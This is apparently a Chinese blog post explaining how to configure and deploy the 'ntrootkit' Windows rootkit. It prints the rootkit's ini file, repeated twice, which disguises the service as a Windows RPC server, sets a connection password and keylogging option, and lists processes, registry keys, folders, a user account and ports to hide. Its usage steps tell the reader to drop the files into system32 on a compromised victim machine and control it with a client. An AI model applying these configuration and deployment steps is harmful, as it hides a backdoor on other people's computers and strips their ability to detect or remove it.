Rootkit之ntrootkit的配置使用
2015-02-10 20:33
274 查看
NTrootkit一,配置方法
\\filename:ntrootkit.ini
\\This is the init file of yyt_hac's ntrootkit,please modify it correctly or the rootkit
\\can't be installed!!!
[GLOBAL] //下面为配置内容
\\servicename is the ntrootkit 's servicename
servicename=tsserver //服务名
servdispname=rpcsvr
servdescription=windows system rpc server
installdir=com\sserver //安装目录
connpass=12345 //连接密码
appname=51cto.exe
keylog=0 //0为不记录键盘
workmode=1 //0为sniffer模式
[HIDDEN PROCNAME] //要隐藏的服务名
51cto
[HIDDEN REGKEY] //要隐藏的注册表键
zero\soft\...\...\xxx
[HIDDEN REGVALUE] //要隐藏的注册表键值
zero\soft\...\...
[HIDDEN FILEDIR] //要隐藏的文件目录
c:\rootkit
[HIDDEN SERVICE] //要隐藏的服务名
servicert
[HIDDEN USER] //要隐藏的用户名
zerosecurity
[HIDDEN TCPPORT] //要隐藏的tcp端口
tcpport=5768
[HIDDEN UDPPORT] //要隐藏的udp端口
udpport=4000
二,使用方法
①:将配置文件 .ini和服务端ntrootkit.exe放入肉鸡的 system32目录下,然后运行ntrootkit.exe安装;ntrootkit -u password 可卸载;
②:客户端用rtclient连接;
\\filename:ntrootkit.ini
\\This is the init file of yyt_hac's ntrootkit,please modify it correctly or the rootkit
\\can't be installed!!!
[GLOBAL] //下面为配置内容
\\servicename is the ntrootkit 's servicename
servicename=tsserver //服务名
servdispname=rpcsvr
servdescription=windows system rpc server
installdir=com\sserver //安装目录
connpass=12345 //连接密码
appname=51cto.exe
keylog=0 //0为不记录键盘
workmode=1 //0为sniffer模式
[HIDDEN PROCNAME] //要隐藏的服务名
51cto
[HIDDEN REGKEY] //要隐藏的注册表键
zero\soft\...\...\xxx
[HIDDEN REGVALUE] //要隐藏的注册表键值
zero\soft\...\...
[HIDDEN FILEDIR] //要隐藏的文件目录
c:\rootkit
[HIDDEN SERVICE] //要隐藏的服务名
servicert
[HIDDEN USER] //要隐藏的用户名
zerosecurity
[HIDDEN TCPPORT] //要隐藏的tcp端口
tcpport=5768
[HIDDEN UDPPORT] //要隐藏的udp端口
udpport=4000
二,使用方法
①:将配置文件 .ini和服务端ntrootkit.exe放入肉鸡的 system32目录下,然后运行ntrootkit.exe安装;ntrootkit -u password 可卸载;
②:客户端用rtclient连接;
相关文章推荐
- zlib 与 libpng 的配置与使用 part 3 libpng的安装与生成PNG图片
- 使用Log4j为项目配置日志输出应用详解以及示例演示的实现分析
- 如何配置才能使用InterDev 来调试ASP代码 zt
- Ibatis2.0使用说明(二)——配置篇(1)[原]
- PTF3 配置管理使用手册
- Java中封装配置文件(1)-使用Properties
- lotus R6下使用Servlet的配置方法
- ASP.NET中使用web.config配置web应用程序中的数据库连接
- CVS服务器与WinCVS的配置与使用(zt)
- 使用WEBLOGIC7.0配置ProxyServer实例
- 使用PVCS系列软件构建配置管理环境(三)
- 怎样配置 WSS 以使用 Kerberos 身份验证(上)
- 怎样配置 WSS 以使用 Kerberos 身份验证(下)
- 使用PVCS系列软件构建配置管理环境(四)
- JBOSS3.0.4配置及使用初步
- zlib 与 libpng 的配置与使用 part 2 zlib的安装
- 使用PVCS系列软件构建配置管理环境(二)
- 使用web.config配置应用程序参数
- 使用 netfilter/iptables 为 Linux(内核 2.4.x )配置防火墙
- Ibatis2.0使用说明(二)——配置篇(2)[原]